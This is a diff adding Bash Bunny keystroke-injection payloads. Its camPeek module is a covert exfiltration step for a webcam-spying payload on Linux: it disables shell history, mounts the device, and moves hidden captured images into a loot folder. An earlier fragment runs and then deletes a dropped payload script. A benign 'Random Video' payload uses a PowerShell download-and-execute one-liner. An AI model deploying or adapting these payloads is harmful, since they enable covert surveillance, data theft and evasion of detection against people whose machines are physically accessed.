Q STRING /tmp/./payload.sh
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 12000
|
||||||
|
Q STRING rm /tmp/payload.sh
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
# [Unmounting BashBunny]
|
||||||
|
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
Q STRING exit
|
||||||
|
Q ENTER
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,43 @@
|
||||||
|
# Title: camPeek
|
||||||
|
# Description: camPeek payload's exfilteration module to move captured images to bunny.
|
||||||
|
# AUTHOR: drapl0n
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Execution
|
||||||
|
# Target: GNU/Linux operating systems with systemd.
|
||||||
|
# Attackmodes: HID, Storage.
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE STORAGE HID
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
LED ATTACK
|
||||||
|
Q DELAY 1000
|
||||||
|
Q CTRL-ALT t
|
||||||
|
Q DELAY 1000
|
||||||
|
|
||||||
|
# [Prevent storing history]
|
||||||
|
Q STRING unset HISTFILE
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Fetching BashBunny's block device]
|
||||||
|
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 200
|
||||||
|
|
||||||
|
# [Mounting BashBunny]
|
||||||
|
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 2000
|
||||||
|
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
# [transfering payload script]
|
||||||
|
# create directory named camPeek in /loot/
|
||||||
|
Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \&
|
||||||
|
Q ENTER
|
||||||
|
Q STRING disown \&\& exit
|
||||||
|
Q ENTER
|
|
@ -0,0 +1,33 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Random Video
|
||||||
|
# Description: Downloads a list of vids from YouTube. Then pick a random one then opens it.
|
||||||
|
# Author: Cribbit
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: General
|
||||||
|
# Target: Windows (Powershell 5.1+)
|
||||||
|
# Attackmodes: RNDIS_ETHERNET HID
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE RNDIS_ETHERNET HID
|
||||||
|
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
GET HOST_IP
|
||||||
|
|
||||||
|
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
|
||||||
|
# starting server
|
||||||
|
LED SPECIAL
|
||||||
|
|
||||||
|
# disallow outgoing dns requests so server starts immediately
|
||||||
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||||
|
python -m SimpleHTTPServer 80 &
|
||||||
|
|
||||||
|
# wait until port is listening
|
||||||
|
while ! nc -z localhost 80; do sleep 0.2; done
|
||||||
|
|
||||||
|
# attack commences
|
||||||
|
LED ATTACK
|
||||||
|
QUACK DELAY 300
|
||||||
|
RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,24 @@
|
||||||
|
# Random Video
|
||||||
|
- Author: Cribbit
|
||||||
|
- Version: 1.0
|
||||||
|
- Tested on: Windows 10 (Powershell 5.1+)
|
||||||
|
- Category: General
|
||||||
|
- Attackmode: HID & RNDIS_ETHERNET
|
||||||
|
- Extensions: Run
|
||||||
|
|
||||||
|
## Change Log
|
||||||
|
| Version | Changes |
|
||||||
|
| ------- | --------------- |
|
||||||
|
| 1.0 | Initial release |
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed).
|
||||||
|
|
||||||
|
Then pick one at random, then opens it in the browser.
|
||||||
|
|
||||||
|
## Colours
|
||||||
|
| Status | Colour | Description |
|
||||||
|
| -------- | ----------------------------- | --------------------------- |
|
||||||
|
| SETUP | Magenta solid | Setting attack mode |
|
||||||
|
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||||
|
| FINISHED | Green blink followed by SOLID | Injection finished |
|
|
@ -0,0 +1,24 @@
|
||||||
|
# Get the RSS feed for the Hak5 Channel
|
||||||
|
Write-Output "Connecting to youtube"
|
||||||
|
$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml"
|
||||||
|
Write-Output $Response.StatusCode
|
||||||
|
# See if it successful
|
||||||
|
If ($Response.StatusCode -eq "200") {
|
||||||
|
# set the XML
|
||||||
|
$Xml = [xml]$Response.Content
|
||||||
|
$Entries = @()
|
||||||
|
# Loop each entry creating an object
|
||||||
|
ForEach ($Entry in $Xml.feed.entry) {
|
||||||
|
$Entries += [PSCustomObject] @{
|
||||||
|
'Updated' = [datetime]$Entry.updated
|
||||||
|
'Title' = $Entry.title
|
||||||
|
'Link' = $Entry.Link.href
|
||||||
|
}
|
||||||
|
}
|
||||||
|
# Gets a random number
|
||||||
|
$int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)
|
||||||
|
$Entry = $Entries[$int]
|
||||||
|
# Opens link
|
||||||
|
Start-Process $Entry.Link
|
||||||
|
Write-Output $Entry.Title
|
||||||
|
}
|
Loading…
Reference in New Issue